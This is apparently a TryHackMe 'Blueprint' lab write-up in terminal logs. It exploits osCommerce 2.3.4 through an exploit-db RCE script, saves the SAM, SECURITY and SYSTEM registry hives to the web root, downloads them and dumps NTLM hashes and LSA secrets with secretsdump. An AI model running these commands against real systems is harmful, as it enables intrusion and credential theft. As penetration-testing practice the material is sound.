TryHackMe Blueprint
nmap
nmap -sV 10.10.239.229
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-08 17:40 EST
Nmap scan report for 10.10.239.229
Host is up (0.28s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc?
139/tcp open netbios-ssn?
443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open unknown
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port139-TCP:V=7.94SVN%I=7%D=2/8%Time=65C5589E%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,5,"\x83\0\0\x01\x8f");
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.32 seconds
Web Exploitation
feroxbuster -u http://10.10.239.229:8080 --silent
http://10.10.239.229:8080/oscommerce-2.3.4 => http://10.10.239.229:8080/oscommerce-2.3.4/ OsCommerce 2.3.4 https://www.exploit-db.com/exploits/50128
wget https://www.exploit-db.com/raw/50128
--2024-02-08 18:03:03-- https://www.exploit-db.com/raw/50128
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2501 (2.4K) [text/plain]
Saving to: ‘50128’
50128 100%[=============================================================================>] 2.44K --.-KB/s in 0s
2024-02-08 18:03:04 (18.8 MB/s) - ‘50128’ saved [2501/2501]
┌──(kali㉿kali)-[~]
└─$ mv 50128 oscommerceExploit.py
┌──(kali㉿kali)-[~]
└─$ python oscommerceExploit.py http://10.10.239.229:8080/oscommerce-2.3.4/catalog
[*] Install directory still available, the host likely vulnerable to the exploit.
[*] Testing injecting system command to test vulnerability
User: nt authority\system
RCE_SHELL$ reg.exe save hklm\sam C:\xampp\htdocs\oscommerce-2.3.4\sam.save
The operation completed successfully.
RCE_SHELL$ reg.exe save hklm\security C:\xampp\htdocs\oscommerce-2.3.4\security.save
The operation completed successfully.
RCE_SHELL$ reg.exe save hklm\system C:\xampp\htdocs\oscommerce-2.3.4\system.save
The operation completed successfully.Now these can be downloaded from the webserver
┌──(kali㉿kali)-[~/Downloads]
└─$ wget http://10.10.239.229:8080/oscommerce-2.3.4/sam.save
--2024-02-08 18:09:46-- http://10.10.239.229:8080/oscommerce-2.3.4/sam.save
Connecting to 10.10.239.229:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24576 (24K)
Saving to: ‘sam.save’
sam.save 100%[============================================================================>] 24.00K 7.89KB/s in 3.0s
2024-02-08 18:09:49 (7.89 KB/s) - ‘sam.save’ saved [24576/24576]
┌──(kali㉿kali)-[~/Downloads]
└─$ wget http://10.10.239.229:8080/oscommerce-2.3.4/security.save
--2024-02-08 18:09:55-- http://10.10.239.229:8080/oscommerce-2.3.4/security.save
Connecting to 10.10.239.229:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24576 (24K)
Saving to: ‘security.save’
security.save 100%[============================================================================>] 24.00K 37.9KB/s in 0.6s
2024-02-08 18:09:56 (37.9 KB/s) - ‘security.save’ saved [24576/24576]
┌──(kali㉿kali)-[~/Downloads]
└─$ wget http://10.10.239.229:8080/oscommerce-2.3.4/system.save
--2024-02-08 18:10:01-- http://10.10.239.229:8080/oscommerce-2.3.4/system.save
Connecting to 10.10.239.229:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12795904 (12M)
Saving to: ‘system.save’
system.save 100%[============================================================================>] 12.20M 1.12MB/s in 13s
2024-02-08 18:10:15 (949 KB/s) - ‘system.save’ saved [12795904/12795904]Hash Dumping
python /opt/impacket/examples/secretsdump.py -sam /home/kali/Downloads/sam.save -security /home/kali/Downloads/security.save -system /home/kali/Downloads/system.save LOCAL
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0x147a48de4a9815d2aa479598592b086f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):malware
[*] DPAPI_SYSTEM
dpapi_machinekey:0x9bd2f17b538da4076bf2ecff91dddfa93598c280
dpapi_userkey:0x251de677564f950bb643b8d7fdfafec784a730d1
[-] NTDSHashes.__init__() got an unexpected keyword argument 'ldapFilter'
[*] Cleaning up... admin
notice that webshell is already admin.
RCE_SHELL$ whoami
nt authority\systemLast updated